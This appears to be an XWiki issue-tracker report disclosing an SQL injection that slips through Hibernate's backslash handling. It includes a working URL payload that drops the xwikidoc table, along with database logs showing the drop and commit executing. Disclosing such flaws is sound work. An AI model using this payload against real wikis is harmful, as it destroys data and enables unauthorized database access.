Description
SQL injection ruin bypasses XWiki and Hibernate security.
Against multi-lingual wikis, can be used by anonymous user.
Also effective against single language wikis if user is logged in.
http://127.0.0.1:8081/xwikiTrunk/bin/view/Main\\' or ' = /; drop table xwikidoc; commit; --\
Tested using PostgreSQL and Mysql.
' is converted to '' and query is generated:
select doc.language from XWikiDocument as doc where doc.space = 'Main
'' or '' = ' and doc.name = '; drop table xwikidoc; commit; --\' and (doc.language <> '' or (doc.language is not null and '' is null))
Hibernate turns
into \ and "Main
''" becomes "Main\''"
Postgres log:
WARNING: nonstandard use of \' in a string literal at character 100
HINT: Use '' to write quotes in strings, or use the escape string syntax (E'...').
LOG: execute <unnamed>: select xwikidocum0_.XWD_LANGUAGE as col_0_0_ from xwikidoc xwikidocum0_ where xwikidocum0_.XWD_WEB='Main\'' or '' = ' and xwikidocum0_.XWD_NAME='
LOG: execute <unnamed>: drop table xwikidoc
LOG: execute <unnamed>: commit
Attachments
Issue Links
- depends on
-
XWIKI-4755 Hibernate doesn't treat backslashes correctly --> sql injection.
-
- Closed
-